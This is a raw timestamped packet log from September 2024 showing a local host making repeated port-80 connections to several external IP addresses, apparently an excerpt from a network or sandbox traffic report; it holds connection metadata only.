                                                          Sep 11, 2024 22:03:13.543900967 CEST8049712199.192.19.19192.168.2.10
                                                          Sep 11, 2024 22:03:13.543935061 CEST8049712199.192.19.19192.168.2.10
                                                          Sep 11, 2024 22:03:13.543971062 CEST8049712199.192.19.19192.168.2.10
                                                          Sep 11, 2024 22:03:13.543977022 CEST4971280192.168.2.10199.192.19.19
                                                          Sep 11, 2024 22:03:13.544075012 CEST4971280192.168.2.10199.192.19.19
                                                          Sep 11, 2024 22:03:13.640767097 CEST8049712199.192.19.19192.168.2.10
                                                          Sep 11, 2024 22:03:13.640805006 CEST8049712199.192.19.19192.168.2.10
                                                          Sep 11, 2024 22:03:13.640819073 CEST8049712199.192.19.19192.168.2.10
                                                          Sep 11, 2024 22:03:13.641236067 CEST4971280192.168.2.10199.192.19.19
                                                          Sep 11, 2024 22:03:13.643815994 CEST4971280192.168.2.10199.192.19.19
                                                          Sep 11, 2024 22:03:13.648560047 CEST8049712199.192.19.19192.168.2.10
                                                          Sep 11, 2024 22:03:19.290463924 CEST4971380192.168.2.1091.184.0.111
                                                          Sep 11, 2024 22:03:19.295568943 CEST804971391.184.0.111192.168.2.10
                                                          Sep 11, 2024 22:03:19.295658112 CEST4971380192.168.2.1091.184.0.111
                                                          Sep 11, 2024 22:03:19.297724009 CEST4971380192.168.2.1091.184.0.111
                                                          Sep 11, 2024 22:03:19.302648067 CEST804971391.184.0.111192.168.2.10
                                                          Sep 11, 2024 22:03:19.921907902 CEST804971391.184.0.111192.168.2.10
                                                          Sep 11, 2024 22:03:19.921993017 CEST804971391.184.0.111192.168.2.10
                                                          Sep 11, 2024 22:03:19.922112942 CEST4971380192.168.2.1091.184.0.111
                                                          Sep 11, 2024 22:03:20.799472094 CEST4971380192.168.2.1091.184.0.111
                                                          Sep 11, 2024 22:03:21.822494030 CEST4971480192.168.2.1091.184.0.111
                                                          Sep 11, 2024 22:03:21.827776909 CEST804971491.184.0.111192.168.2.10
                                                          Sep 11, 2024 22:03:21.827893019 CEST4971480192.168.2.1091.184.0.111
                                                          Sep 11, 2024 22:03:21.832238913 CEST4971480192.168.2.1091.184.0.111
                                                          Sep 11, 2024 22:03:21.837368011 CEST804971491.184.0.111192.168.2.10
                                                          Sep 11, 2024 22:03:22.474281073 CEST804971491.184.0.111192.168.2.10
                                                          Sep 11, 2024 22:03:22.474526882 CEST804971491.184.0.111192.168.2.10
                                                          Sep 11, 2024 22:03:22.474600077 CEST4971480192.168.2.1091.184.0.111
                                                          Sep 11, 2024 22:03:23.346399069 CEST4971480192.168.2.1091.184.0.111
                                                          Sep 11, 2024 22:03:24.366425037 CEST4971580192.168.2.1091.184.0.111
                                                          Sep 11, 2024 22:03:24.662954092 CEST804971591.184.0.111192.168.2.10
                                                          Sep 11, 2024 22:03:24.663149118 CEST4971580192.168.2.1091.184.0.111
                                                          Sep 11, 2024 22:03:24.665750980 CEST4971580192.168.2.1091.184.0.111
                                                          Sep 11, 2024 22:03:24.670763016 CEST804971591.184.0.111192.168.2.10
                                                          Sep 11, 2024 22:03:24.670875072 CEST804971591.184.0.111192.168.2.10
                                                          Sep 11, 2024 22:03:25.415575027 CEST804971591.184.0.111192.168.2.10
                                                          Sep 11, 2024 22:03:25.415776014 CEST804971591.184.0.111192.168.2.10
                                                          Sep 11, 2024 22:03:25.415863037 CEST4971580192.168.2.1091.184.0.111
                                                          Sep 11, 2024 22:03:26.174576998 CEST4971580192.168.2.1091.184.0.111
                                                          Sep 11, 2024 22:03:27.193115950 CEST4971680192.168.2.1091.184.0.111
                                                          Sep 11, 2024 22:03:27.198112011 CEST804971691.184.0.111192.168.2.10
                                                          Sep 11, 2024 22:03:27.198227882 CEST4971680192.168.2.1091.184.0.111
                                                          Sep 11, 2024 22:03:27.200853109 CEST4971680192.168.2.1091.184.0.111
                                                          Sep 11, 2024 22:03:27.205774069 CEST804971691.184.0.111192.168.2.10
                                                          Sep 11, 2024 22:03:27.843063116 CEST804971691.184.0.111192.168.2.10
                                                          Sep 11, 2024 22:03:27.843163013 CEST804971691.184.0.111192.168.2.10
                                                          Sep 11, 2024 22:03:27.843431950 CEST4971680192.168.2.1091.184.0.111
                                                          Sep 11, 2024 22:03:27.852202892 CEST4971680192.168.2.1091.184.0.111
                                                          Sep 11, 2024 22:03:27.857146978 CEST804971691.184.0.111192.168.2.10
                                                          Sep 11, 2024 22:03:33.549061060 CEST4971780192.168.2.10193.108.130.23
                                                          Sep 11, 2024 22:03:33.553972006 CEST8049717193.108.130.23192.168.2.10
                                                          Sep 11, 2024 22:03:33.554085970 CEST4971780192.168.2.10193.108.130.23
                                                          Sep 11, 2024 22:03:33.556015015 CEST4971780192.168.2.10193.108.130.23
                                                          Sep 11, 2024 22:03:33.560873985 CEST8049717193.108.130.23192.168.2.10
                                                          Sep 11, 2024 22:03:34.587290049 CEST8049717193.108.130.23192.168.2.10
                                                          Sep 11, 2024 22:03:34.587312937 CEST8049717193.108.130.23192.168.2.10
                                                          Sep 11, 2024 22:03:34.587327957 CEST8049717193.108.130.23192.168.2.10
                                                          Sep 11, 2024 22:03:34.587376118 CEST8049717193.108.130.23192.168.2.10
                                                          Sep 11, 2024 22:03:34.587404966 CEST8049717193.108.130.23192.168.2.10
                                                          Sep 11, 2024 22:03:34.587409019 CEST4971780192.168.2.10193.108.130.23
                                                          Sep 11, 2024 22:03:34.587430954 CEST8049717193.108.130.23192.168.2.10
                                                          Sep 11, 2024 22:03:34.587440014 CEST4971780192.168.2.10193.108.130.23
                                                          Sep 11, 2024 22:03:34.587446928 CEST8049717193.108.130.23192.168.2.10
                                                          Sep 11, 2024 22:03:34.587464094 CEST8049717193.108.130.23192.168.2.10
                                                          Sep 11, 2024 22:03:34.587471962 CEST4971780192.168.2.10193.108.130.23
                                                          Sep 11, 2024 22:03:34.587480068 CEST8049717193.108.130.23192.168.2.10
                                                          Sep 11, 2024 22:03:34.587493896 CEST8049717193.108.130.23192.168.2.10
                                                          Sep 11, 2024 22:03:34.587523937 CEST4971780192.168.2.10193.108.130.23
                                                          Sep 11, 2024 22:03:34.587548971 CEST4971780192.168.2.10193.108.130.23
                                                          Sep 11, 2024 22:03:34.588038921 CEST8049717193.108.130.23192.168.2.10
                                                          Sep 11, 2024 22:03:34.590975046 CEST4971780192.168.2.10193.108.130.23
                                                          Sep 11, 2024 22:03:35.065637112 CEST4971780192.168.2.10193.108.130.23
                                                          Sep 11, 2024 22:03:36.087734938 CEST4971880192.168.2.10193.108.130.23
                                                          Sep 11, 2024 22:03:36.092735052 CEST8049718193.108.130.23192.168.2.10
                                                          Sep 11, 2024 22:03:36.092818022 CEST4971880192.168.2.10193.108.130.23
                                                          Sep 11, 2024 22:03:36.094854116 CEST4971880192.168.2.10193.108.130.23
                                                          Sep 11, 2024 22:03:36.099731922 CEST8049718193.108.130.23192.168.2.10
                                                          Sep 11, 2024 22:03:37.143892050 CEST8049718193.108.130.23192.168.2.10
                                                          Sep 11, 2024 22:03:37.143923998 CEST8049718193.108.130.23192.168.2.10
                                                          Sep 11, 2024 22:03:37.143942118 CEST8049718193.108.130.23192.168.2.10
                                                          Sep 11, 2024 22:03:37.143956900 CEST8049718193.108.130.23192.168.2.10
                                                          Sep 11, 2024 22:03:37.143982887 CEST8049718193.108.130.23192.168.2.10
                                                          Sep 11, 2024 22:03:37.143997908 CEST8049718193.108.130.23192.168.2.10
                                                          Sep 11, 2024 22:03:37.144015074 CEST8049718193.108.130.23192.168.2.10
                                                          Sep 11, 2024 22:03:37.144028902 CEST8049718193.108.130.23192.168.2.10
                                                          Sep 11, 2024 22:03:37.144053936 CEST8049718193.108.130.23192.168.2.10
                                                          Sep 11, 2024 22:03:37.144072056 CEST4971880192.168.2.10193.108.130.23
                                                          Sep 11, 2024 22:03:37.144107103 CEST4971880192.168.2.10193.108.130.23
                                                          Sep 11, 2024 22:03:37.144121885 CEST4971880192.168.2.10193.108.130.23
                                                          Sep 11, 2024 22:03:37.596472979 CEST4971880192.168.2.10193.108.130.23
                                                          Sep 11, 2024 22:03:38.616827965 CEST4971980192.168.2.10193.108.130.23
                                                          Sep 11, 2024 22:03:38.621962070 CEST8049719193.108.130.23192.168.2.10
                                                          Sep 11, 2024 22:03:38.622049093 CEST4971980192.168.2.10193.108.130.23
                                                          Sep 11, 2024 22:03:38.624823093 CEST4971980192.168.2.10193.108.130.23
                                                          Sep 11, 2024 22:03:38.629720926 CEST8049719193.108.130.23192.168.2.10
                                                          Sep 11, 2024 22:03:38.629756927 CEST8049719193.108.130.23192.168.2.10
                                                          Sep 11, 2024 22:03:39.725352049 CEST8049719193.108.130.23192.168.2.10
                                                          Sep 11, 2024 22:03:39.725377083 CEST8049719193.108.130.23192.168.2.10
                                                          Sep 11, 2024 22:03:39.725387096 CEST8049719193.108.130.23192.168.2.10
                                                          Sep 11, 2024 22:03:39.725397110 CEST8049719193.108.130.23192.168.2.10
                                                          Sep 11, 2024 22:03:39.725406885 CEST8049719193.108.130.23192.168.2.10
                                                          Sep 11, 2024 22:03:39.725416899 CEST8049719193.108.130.23192.168.2.10
                                                          Sep 11, 2024 22:03:39.725428104 CEST8049719193.108.130.23192.168.2.10
                                                          Sep 11, 2024 22:03:39.725442886 CEST8049719193.108.130.23192.168.2.10
                                                          Sep 11, 2024 22:03:39.725436926 CEST4971980192.168.2.10193.108.130.23
                                                          Sep 11, 2024 22:03:39.725519896 CEST4971980192.168.2.10193.108.130.23
                                                          Sep 11, 2024 22:03:39.725817919 CEST8049719193.108.130.23192.168.2.10
                                                          Sep 11, 2024 22:03:39.725857019 CEST8049719193.108.130.23192.168.2.10
                                                          Sep 11, 2024 22:03:39.725912094 CEST4971980192.168.2.10193.108.130.23
                                                          Sep 11, 2024 22:03:40.127810001 CEST4971980192.168.2.10193.108.130.23
                                                          Sep 11, 2024 22:03:41.146626949 CEST4972080192.168.2.10193.108.130.23
                                                          Sep 11, 2024 22:03:41.151690006 CEST8049720193.108.130.23192.168.2.10
                                                          Sep 11, 2024 22:03:41.151789904 CEST4972080192.168.2.10193.108.130.23
                                                          Sep 11, 2024 22:03:41.153753996 CEST4972080192.168.2.10193.108.130.23
                                                          Sep 11, 2024 22:03:41.158965111 CEST8049720193.108.130.23192.168.2.10
                                                          Sep 11, 2024 22:03:42.170047998 CEST8049720193.108.130.23192.168.2.10
                                                          Sep 11, 2024 22:03:42.170073986 CEST8049720193.108.130.23192.168.2.10
                                                          Sep 11, 2024 22:03:42.170263052 CEST4972080192.168.2.10193.108.130.23
                                                          Sep 11, 2024 22:03:42.173199892 CEST4972080192.168.2.10193.108.130.23
                                                          Sep 11, 2024 22:03:42.178057909 CEST8049720193.108.130.23192.168.2.10
                                                          Sep 11, 2024 22:03:47.893899918 CEST4972180192.168.2.1047.239.13.172
                                                          Sep 11, 2024 22:03:47.899576902 CEST804972147.239.13.172192.168.2.10
                                                          Sep 11, 2024 22:03:47.899647951 CEST4972180192.168.2.1047.239.13.172
                                                          Sep 11, 2024 22:03:47.902614117 CEST4972180192.168.2.1047.239.13.172
                                                          Sep 11, 2024 22:03:47.907407999 CEST804972147.239.13.172192.168.2.10
                                                          Sep 11, 2024 22:03:48.831069946 CEST804972147.239.13.172192.168.2.10
                                                          Sep 11, 2024 22:03:48.831166983 CEST804972147.239.13.172192.168.2.10
                                                          Sep 11, 2024 22:03:48.831924915 CEST4972180192.168.2.1047.239.13.172
                                                          Sep 11, 2024 22:03:49.408838034 CEST4972180192.168.2.1047.239.13.172
                                                          Sep 11, 2024 22:03:50.427730083 CEST4972280192.168.2.1047.239.13.172
                                                          Sep 11, 2024 22:03:50.432698011 CEST804972247.239.13.172192.168.2.10
                                                          Sep 11, 2024 22:03:50.432818890 CEST4972280192.168.2.1047.239.13.172
                                                          Sep 11, 2024 22:03:50.434772968 CEST4972280192.168.2.1047.239.13.172
                                                          Sep 11, 2024 22:03:50.439821959 CEST804972247.239.13.172192.168.2.10
                                                          Sep 11, 2024 22:03:51.334691048 CEST804972247.239.13.172192.168.2.10
                                                          Sep 11, 2024 22:03:51.334779978 CEST804972247.239.13.172192.168.2.10
                                                          Sep 11, 2024 22:03:51.334837914 CEST4972280192.168.2.1047.239.13.172
                                                          Sep 11, 2024 22:03:51.940064907 CEST4972280192.168.2.1047.239.13.172
                                                          Sep 11, 2024 22:03:52.958580971 CEST4972380192.168.2.1047.239.13.172
                                                          Sep 11, 2024 22:03:52.964344978 CEST804972347.239.13.172192.168.2.10
                                                          Sep 11, 2024 22:03:52.967355013 CEST4972380192.168.2.1047.239.13.172
                                                          Sep 11, 2024 22:03:52.969449043 CEST4972380192.168.2.1047.239.13.172
                                                          Sep 11, 2024 22:03:52.974972010 CEST804972347.239.13.172192.168.2.10
                                                          Sep 11, 2024 22:03:52.975099087 CEST804972347.239.13.172192.168.2.10
                                                          Sep 11, 2024 22:03:53.999375105 CEST804972347.239.13.172192.168.2.10
                                                          Sep 11, 2024 22:03:53.999433041 CEST804972347.239.13.172192.168.2.10
                                                          Sep 11, 2024 22:03:53.999444962 CEST804972347.239.13.172192.168.2.10
                                                          Sep 11, 2024 22:03:53.999480963 CEST4972380192.168.2.1047.239.13.172
                                                          Sep 11, 2024 22:03:53.999516010 CEST4972380192.168.2.1047.239.13.172
                                                          Sep 11, 2024 22:03:54.471396923 CEST4972380192.168.2.1047.239.13.172
                                                          Sep 11, 2024 22:03:55.489850998 CEST4972480192.168.2.1047.239.13.172
                                                          Sep 11, 2024 22:03:55.494976044 CEST804972447.239.13.172192.168.2.10
                                                          Sep 11, 2024 22:03:55.495083094 CEST4972480192.168.2.1047.239.13.172
                                                          Sep 11, 2024 22:03:55.497061014 CEST4972480192.168.2.1047.239.13.172
                                                          Sep 11, 2024 22:03:55.502000093 CEST804972447.239.13.172192.168.2.10
                                                          Sep 11, 2024 22:03:56.395628929 CEST804972447.239.13.172192.168.2.10
                                                          Sep 11, 2024 22:03:56.395741940 CEST804972447.239.13.172192.168.2.10
                                                          Sep 11, 2024 22:03:56.395788908 CEST4972480192.168.2.1047.239.13.172
                                                          Sep 11, 2024 22:03:56.398690939 CEST4972480192.168.2.1047.239.13.172
                                                          Sep 11, 2024 22:03:56.403521061 CEST804972447.239.13.172192.168.2.10
                                                          Sep 11, 2024 22:04:02.798827887 CEST4972580192.168.2.10154.213.157.32
                                                          Sep 11, 2024 22:04:02.803716898 CEST8049725154.213.157.32192.168.2.10
                                                          Sep 11, 2024 22:04:02.804987907 CEST4972580192.168.2.10154.213.157.32
                                                          Sep 11, 2024 22:04:02.810854912 CEST4972580192.168.2.10154.213.157.32
                                                          Sep 11, 2024 22:04:02.815767050 CEST8049725154.213.157.32192.168.2.10
                                                          Sep 11, 2024 22:04:04.315697908 CEST4972580192.168.2.10154.213.157.32
                                                          Sep 11, 2024 22:04:04.364603996 CEST8049725154.213.157.32192.168.2.10
                                                          Sep 11, 2024 22:04:05.334836006 CEST4972680192.168.2.10154.213.157.32
                                                          Sep 11, 2024 22:04:05.340046883 CEST8049726154.213.157.32192.168.2.10
                                                          Sep 11, 2024 22:04:05.342937946 CEST4972680192.168.2.10154.213.157.32
                                                          Sep 11, 2024 22:04:05.346828938 CEST4972680192.168.2.10154.213.157.32
                                                          Sep 11, 2024 22:04:05.351845026 CEST8049726154.213.157.32192.168.2.10
                                                          Sep 11, 2024 22:04:06.849750996 CEST4972680192.168.2.10154.213.157.32
                                                          Sep 11, 2024 22:04:06.896420956 CEST8049726154.213.157.32192.168.2.10
                                                          Sep 11, 2024 22:04:07.866117001 CEST4972780192.168.2.10154.213.157.32
                                                          Sep 11, 2024 22:04:07.871114016 CEST8049727154.213.157.32192.168.2.10
                                                          Sep 11, 2024 22:04:07.871243000 CEST4972780192.168.2.10154.213.157.32
                                                          Sep 11, 2024 22:04:07.873356104 CEST4972780192.168.2.10154.213.157.32
                                                          Sep 11, 2024 22:04:07.878268003 CEST8049727154.213.157.32192.168.2.10
                                                          Sep 11, 2024 22:04:07.878298044 CEST8049727154.213.157.32192.168.2.10
                                                          Sep 11, 2024 22:04:09.377960920 CEST4972780192.168.2.10154.213.157.32
                                                          Sep 11, 2024 22:04:09.426033020 CEST8049727154.213.157.32192.168.2.10
                                                          Sep 11, 2024 22:04:10.397391081 CEST4972880192.168.2.10154.213.157.32
                                                          Sep 11, 2024 22:04:10.402308941 CEST8049728154.213.157.32192.168.2.10
                                                          Sep 11, 2024 22:04:10.402369976 CEST4972880192.168.2.10154.213.157.32
                                                          Sep 11, 2024 22:04:10.404664993 CEST4972880192.168.2.10154.213.157.32
                                                          Sep 11, 2024 22:04:10.409502029 CEST8049728154.213.157.32192.168.2.10
                                                          Sep 11, 2024 22:04:24.161299944 CEST8049725154.213.157.32192.168.2.10
                                                          Sep 11, 2024 22:04:24.161346912 CEST4972580192.168.2.10154.213.157.32
                                                          Sep 11, 2024 22:04:26.738959074 CEST8049726154.213.157.32192.168.2.10
                                                          Sep 11, 2024 22:04:26.739025116 CEST4972680192.168.2.10154.213.157.32
                                                          Sep 11, 2024 22:04:29.225212097 CEST8049727154.213.157.32192.168.2.10
                                                          Sep 11, 2024 22:04:29.226938009 CEST4972780192.168.2.10154.213.157.32
                                                          Sep 11, 2024 22:04:31.770230055 CEST8049728154.213.157.32192.168.2.10
                                                          Sep 11, 2024 22:04:31.770471096 CEST4972880192.168.2.10154.213.157.32
                                                          Sep 11, 2024 22:04:31.771346092 CEST4972880192.168.2.10154.213.157.32
                                                          Sep 11, 2024 22:04:31.776091099 CEST8049728154.213.157.32192.168.2.10
                                                          Sep 11, 2024 22:04:37.393481016 CEST4972980192.168.2.1047.239.13.172
                                                          Sep 11, 2024 22:04:37.398386002 CEST804972947.239.13.172192.168.2.10
                                                          Sep 11, 2024 22:04:37.398521900 CEST4972980192.168.2.1047.239.13.172
                                                          Sep 11, 2024 22:04:37.402867079 CEST4972980192.168.2.1047.239.13.172
                                                          Sep 11, 2024 22:04:37.407677889 CEST804972947.239.13.172192.168.2.10
                                                          Sep 11, 2024 22:04:38.312841892 CEST804972947.239.13.172192.168.2.10
                                                          Sep 11, 2024 22:04:38.312897921 CEST804972947.239.13.172192.168.2.10
                                                          Sep 11, 2024 22:04:38.312957048 CEST4972980192.168.2.1047.239.13.172
                                                          Sep 11, 2024 22:04:38.909296989 CEST4972980192.168.2.1047.239.13.172
                                                          Sep 11, 2024 22:04:39.927860975 CEST4973080192.168.2.1047.239.13.172
                                                          Sep 11, 2024 22:04:39.932837009 CEST804973047.239.13.172192.168.2.10
                                                          Sep 11, 2024 22:04:39.932912111 CEST4973080192.168.2.1047.239.13.172
                                                          Sep 11, 2024 22:04:39.935009003 CEST4973080192.168.2.1047.239.13.172
                                                          Sep 11, 2024 22:04:39.939857006 CEST804973047.239.13.172192.168.2.10
                                                          Sep 11, 2024 22:04:40.849977016 CEST804973047.239.13.172192.168.2.10
                                                          Sep 11, 2024 22:04:40.849999905 CEST804973047.239.13.172192.168.2.10
                                                          Sep 11, 2024 22:04:40.850212097 CEST4973080192.168.2.1047.239.13.172
                                                          Sep 11, 2024 22:04:41.440372944 CEST4973080192.168.2.1047.239.13.172
                                                          Sep 11, 2024 22:04:42.459584951 CEST4973180192.168.2.1047.239.13.172
                                                          Sep 11, 2024 22:04:42.464648962 CEST804973147.239.13.172192.168.2.10
                                                          Sep 11, 2024 22:04:42.464735031 CEST4973180192.168.2.1047.239.13.172
                                                          Sep 11, 2024 22:04:42.466953993 CEST4973180192.168.2.1047.239.13.172
                                                          Sep 11, 2024 22:04:42.471909046 CEST804973147.239.13.172192.168.2.10
                                                          Sep 11, 2024 22:04:42.471921921 CEST804973147.239.13.172192.168.2.10
                                                          Sep 11, 2024 22:04:43.621826887 CEST804973147.239.13.172192.168.2.10
                                                          Sep 11, 2024 22:04:43.621848106 CEST804973147.239.13.172192.168.2.10
                                                          Sep 11, 2024 22:04:43.622395039 CEST804973147.239.13.172192.168.2.10
                                                          Sep 11, 2024 22:04:43.622662067 CEST4973180192.168.2.1047.239.13.172
                                                          Sep 11, 2024 22:04:43.623411894 CEST804973147.239.13.172192.168.2.10
                                                          Sep 11, 2024 22:04:43.625389099 CEST4973180192.168.2.1047.239.13.172
                                                          Sep 11, 2024 22:04:43.971602917 CEST4973180192.168.2.1047.239.13.172
                                                          Sep 11, 2024 22:04:44.990950108 CEST4973280192.168.2.1047.239.13.172
                                                          Sep 11, 2024 22:04:44.995887041 CEST804973247.239.13.172192.168.2.10
                                                          Sep 11, 2024 22:04:44.997580051 CEST4973280192.168.2.1047.239.13.172
                                                          Sep 11, 2024 22:04:45.001075029 CEST4973280192.168.2.1047.239.13.172
                                                          Sep 11, 2024 22:04:45.005980015 CEST804973247.239.13.172192.168.2.10
                                                          Sep 11, 2024 22:04:45.907720089 CEST804973247.239.13.172192.168.2.10
                                                          Sep 11, 2024 22:04:45.907749891 CEST804973247.239.13.172192.168.2.10
                                                          Sep 11, 2024 22:04:45.907910109 CEST4973280192.168.2.1047.239.13.172
                                                          Sep 11, 2024 22:04:45.910770893 CEST4973280192.168.2.1047.239.13.172
                                                          Sep 11, 2024 22:04:45.915637970 CEST804973247.239.13.172192.168.2.10
                                                          Sep 11, 2024 22:04:50.959475994 CEST4973380192.168.2.1091.195.240.19
                                                          Sep 11, 2024 22:04:50.964469910 CEST804973391.195.240.19192.168.2.10
                                                          Sep 11, 2024 22:04:50.967417002 CEST4973380192.168.2.1091.195.240.19
                                                          Sep 11, 2024 22:04:50.969106913 CEST4973380192.168.2.1091.195.240.19
                                                          Sep 11, 2024 22:04:50.974016905 CEST804973391.195.240.19192.168.2.10
                                                          Sep 11, 2024 22:04:51.625551939 CEST804973391.195.240.19192.168.2.10
                                                          Sep 11, 2024 22:04:51.625576973 CEST804973391.195.240.19192.168.2.10
                                                          Sep 11, 2024 22:04:51.625710964 CEST4973380192.168.2.1091.195.240.19
                                                          Sep 11, 2024 22:04:52.471692085 CEST4973380192.168.2.1091.195.240.19
                                                          Sep 11, 2024 22:04:53.490304947 CEST4973480192.168.2.1091.195.240.19
                                                          Sep 11, 2024 22:04:53.495522022 CEST804973491.195.240.19192.168.2.10
                                                          Sep 11, 2024 22:04:53.495865107 CEST4973480192.168.2.1091.195.240.19
                                                          Sep 11, 2024 22:04:53.498609066 CEST4973480192.168.2.1091.195.240.19
                                                          Sep 11, 2024 22:04:53.503391981 CEST804973491.195.240.19192.168.2.10
                                                          Sep 11, 2024 22:04:54.155144930 CEST804973491.195.240.19192.168.2.10
                                                          Sep 11, 2024 22:04:54.155338049 CEST804973491.195.240.19192.168.2.10
                                                          Sep 11, 2024 22:04:54.155381918 CEST4973480192.168.2.1091.195.240.19
                                                          Sep 11, 2024 22:04:55.002871990 CEST4973480192.168.2.1091.195.240.19
                                                          Sep 11, 2024 22:04:56.022305965 CEST4973580192.168.2.1091.195.240.19
                                                          Sep 11, 2024 22:04:56.027709007 CEST804973591.195.240.19192.168.2.10
                                                          Sep 11, 2024 22:04:56.027789116 CEST4973580192.168.2.1091.195.240.19
                                                          Sep 11, 2024 22:04:56.030184984 CEST4973580192.168.2.1091.195.240.19
                                                          Sep 11, 2024 22:04:56.035068035 CEST804973591.195.240.19192.168.2.10
                                                          Sep 11, 2024 22:04:56.035134077 CEST804973591.195.240.19192.168.2.10
                                                          Sep 11, 2024 22:04:56.682657003 CEST804973591.195.240.19192.168.2.10
                                                          Sep 11, 2024 22:04:56.682750940 CEST804973591.195.240.19192.168.2.10
                                                          Sep 11, 2024 22:04:56.682828903 CEST4973580192.168.2.1091.195.240.19
                                                          Sep 11, 2024 22:04:57.534899950 CEST4973580192.168.2.1091.195.240.19
                                                          Sep 11, 2024 22:04:58.553343058 CEST4973680192.168.2.1091.195.240.19
                                                          Sep 11, 2024 22:04:58.558320999 CEST804973691.195.240.19192.168.2.10
                                                          Sep 11, 2024 22:04:58.558485985 CEST4973680192.168.2.1091.195.240.19
                                                          Sep 11, 2024 22:04:58.560761929 CEST4973680192.168.2.1091.195.240.19
                                                          Sep 11, 2024 22:04:58.565660954 CEST804973691.195.240.19192.168.2.10
                                                          Sep 11, 2024 22:04:59.223208904 CEST804973691.195.240.19192.168.2.10
                                                          Sep 11, 2024 22:04:59.223361015 CEST804973691.195.240.19192.168.2.10
                                                          Sep 11, 2024 22:04:59.223467112 CEST4973680192.168.2.1091.195.240.19
                                                          Sep 11, 2024 22:04:59.226921082 CEST4973680192.168.2.1091.195.240.19
                                                          Sep 11, 2024 22:04:59.233423948 CEST804973691.195.240.19192.168.2.10
                                                          Sep 11, 2024 22:05:04.713535070 CEST4973780192.168.2.10198.12.241.35
                                                          Sep 11, 2024 22:05:04.718719006 CEST8049737198.12.241.35192.168.2.10
                                                          Sep 11, 2024 22:05:04.718806982 CEST4973780192.168.2.10198.12.241.35
                                                          Sep 11, 2024 22:05:04.720838070 CEST4973780192.168.2.10198.12.241.35
                                                          Sep 11, 2024 22:05:04.725590944 CEST8049737198.12.241.35192.168.2.10
                                                          Sep 11, 2024 22:05:05.473997116 CEST8049737198.12.241.35192.168.2.10
                                                          Sep 11, 2024 22:05:05.474024057 CEST8049737198.12.241.35192.168.2.10
                                                          Sep 11, 2024 22:05:05.474036932 CEST8049737198.12.241.35192.168.2.10
                                                          Sep 11, 2024 22:05:05.474049091 CEST8049737198.12.241.35192.168.2.10
                                                          Sep 11, 2024 22:05:05.474061966 CEST8049737198.12.241.35192.168.2.10
                                                          Sep 11, 2024 22:05:05.474073887 CEST8049737198.12.241.35192.168.2.10
                                                          Sep 11, 2024 22:05:05.474118948 CEST4973780192.168.2.10198.12.241.35
                                                          Sep 11, 2024 22:05:05.474118948 CEST4973780192.168.2.10198.12.241.35
                                                          Sep 11, 2024 22:05:05.474118948 CEST4973780192.168.2.10198.12.241.35
                                                          Sep 11, 2024 22:05:05.474216938 CEST8049737198.12.241.35192.168.2.10
                                                          Sep 11, 2024 22:05:05.474237919 CEST8049737198.12.241.35192.168.2.10
                                                          Sep 11, 2024 22:05:05.474250078 CEST8049737198.12.241.35192.168.2.10
                                                          Sep 11, 2024 22:05:05.474271059 CEST8049737198.12.241.35192.168.2.10
                                                          Sep 11, 2024 22:05:05.474292994 CEST4973780192.168.2.10198.12.241.35
                                                          Sep 11, 2024 22:05:05.474373102 CEST4973780192.168.2.10198.12.241.35
                                                          Sep 11, 2024 22:05:05.490009069 CEST8049737198.12.241.35192.168.2.10
                                                          Sep 11, 2024 22:05:05.490288973 CEST4973780192.168.2.10198.12.241.35
                                                          Sep 11, 2024 22:05:06.237385035 CEST4973780192.168.2.10198.12.241.35
                                                          Sep 11, 2024 22:05:07.256743908 CEST4973880192.168.2.10198.12.241.35
                                                          Sep 11, 2024 22:05:07.261734962 CEST8049738198.12.241.35192.168.2.10
                                                          Sep 11, 2024 22:05:07.262017965 CEST4973880192.168.2.10198.12.241.35
                                                          Sep 11, 2024 22:05:07.264355898 CEST4973880192.168.2.10198.12.241.35
                                                          Sep 11, 2024 22:05:07.269246101 CEST8049738198.12.241.35192.168.2.10
                                                          Sep 11, 2024 22:05:08.548958063 CEST8049738198.12.241.35192.168.2.10
                                                          Sep 11, 2024 22:05:08.548971891 CEST8049738198.12.241.35192.168.2.10
                                                          Sep 11, 2024 22:05:08.548978090 CEST8049738198.12.241.35192.168.2.10
                                                          Sep 11, 2024 22:05:08.548983097 CEST8049738198.12.241.35192.168.2.10
                                                          Sep 11, 2024 22:05:08.548990011 CEST8049738198.12.241.35192.168.2.10
                                                          Sep 11, 2024 22:05:08.548995018 CEST8049738198.12.241.35192.168.2.10
                                                          Sep 11, 2024 22:05:08.549005032 CEST8049738198.12.241.35192.168.2.10
                                                          Sep 11, 2024 22:05:08.549010992 CEST8049738198.12.241.35192.168.2.10
                                                          Sep 11, 2024 22:05:08.549015999 CEST8049738198.12.241.35192.168.2.10
                                                          Sep 11, 2024 22:05:08.549027920 CEST8049738198.12.241.35192.168.2.10
                                                          Sep 11, 2024 22:05:08.549097061 CEST4973880192.168.2.10198.12.241.35
                                                          Sep 11, 2024 22:05:08.549118996 CEST4973880192.168.2.10198.12.241.35
                                                          Sep 11, 2024 22:05:08.549135923 CEST8049738198.12.241.35192.168.2.10
                                                          Sep 11, 2024 22:05:08.549160004 CEST8049738198.12.241.35192.168.2.10
                                                          Sep 11, 2024 22:05:08.549207926 CEST4973880192.168.2.10198.12.241.35
                                                          Sep 11, 2024 22:05:08.554317951 CEST8049738198.12.241.35192.168.2.10
                                                          Sep 11, 2024 22:05:08.554411888 CEST4973880192.168.2.10198.12.241.35
                                                          Sep 11, 2024 22:05:08.770906925 CEST4973880192.168.2.10198.12.241.35
                                                          Sep 11, 2024 22:05:09.791240931 CEST4973980192.168.2.10198.12.241.35
                                                          Sep 11, 2024 22:05:10.071151018 CEST8049739198.12.241.35192.168.2.10
                                                          Sep 11, 2024 22:05:10.071233988 CEST4973980192.168.2.10198.12.241.35
                                                          Sep 11, 2024 22:05:10.073736906 CEST4973980192.168.2.10198.12.241.35
                                                          Sep 11, 2024 22:05:10.079245090 CEST8049739198.12.241.35192.168.2.10
                                                          Sep 11, 2024 22:05:10.079794884 CEST8049739198.12.241.35192.168.2.10
                                                          Sep 11, 2024 22:05:10.877616882 CEST8049739198.12.241.35192.168.2.10
                                                          Sep 11, 2024 22:05:10.877641916 CEST8049739198.12.241.35192.168.2.10
                                                          Sep 11, 2024 22:05:10.877654076 CEST8049739198.12.241.35192.168.2.10
                                                          Sep 11, 2024 22:05:10.877664089 CEST8049739198.12.241.35192.168.2.10
                                                          Sep 11, 2024 22:05:10.877682924 CEST8049739198.12.241.35192.168.2.10
                                                          Sep 11, 2024 22:05:10.877700090 CEST8049739198.12.241.35192.168.2.10
                                                          Sep 11, 2024 22:05:10.877711058 CEST8049739198.12.241.35192.168.2.10
